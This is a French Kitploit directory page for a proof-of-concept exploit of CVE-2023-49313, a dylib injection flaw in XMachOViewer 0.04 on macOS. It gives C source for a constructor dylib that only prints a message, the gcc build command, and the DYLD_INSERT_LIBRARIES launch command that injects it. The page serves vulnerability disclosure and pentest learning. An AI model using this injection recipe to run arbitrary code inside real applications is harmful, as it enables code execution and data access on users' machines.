Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-49313 — Exploit de preuve de concept pour une vulnérabilité d'injection de dylib dans XMachOViewer 0.04, démontrant une exécution de code non autorisée via DYLD_INSERT_LIBRARIES sur macOS. | Kitploit
Outils/GitHubGitHub/louiselalanne/cve-2023-49313
ExploitationApprentissage et ÉducationDéveloppement de Charges UtilesExploitation de Binaires
GitHublouiselalanne/cve-2023-49313

CVE-2023-49313

Exploit de preuve de concept pour une vulnérabilité d'injection de dylib dans XMachOViewer 0.04, démontrant une exécution de code non autorisée via DYLD_INSERT_LIBRARIES sur macOS.

Voir le dépôt
41il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-49313

Une vulnérabilité d'injection de dylib dans XMachOViewer 0.04 permet à des attaquants de compromettre l'intégrité. En exploitant cette faille, du code non autorisé peut être injecté dans les processus du produit, ce qui peut potentiellement conduire à un contrôle à distance et à un accès non autorisé à des données utilisateur sensibles.

Captura de Tela 2023-11-27 às 20 06 48

Version portable pour macOS

  • Nous allons d'abord écrire la dylib
root@kitploit:~
#include <syslog.h>
#include <stdio.h>

__attribute__((constructor))
static void poc(void)
{
    printf("Malicious Dylib Inserted");
}
  • Compiler gcc -dynamiclib -arch x86_64 -o poc.dylib poc.c

  • Et injectez-la : DYLD_INSERT_LIBRARIES=poc.dylib /Applications/XMachOViewer.app/Contents/MacOS/XMachOViewer

Ceci ouvrira l'application et exécutera la dylib. Après avoir fermé l'application, on la voit dans le terminal :

Captura de Tela 2023-11-27 às 19 52 57

  • Vous pouvez en apprendre davantage et approfondir le sujet sur : https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries
Télécharger l’outil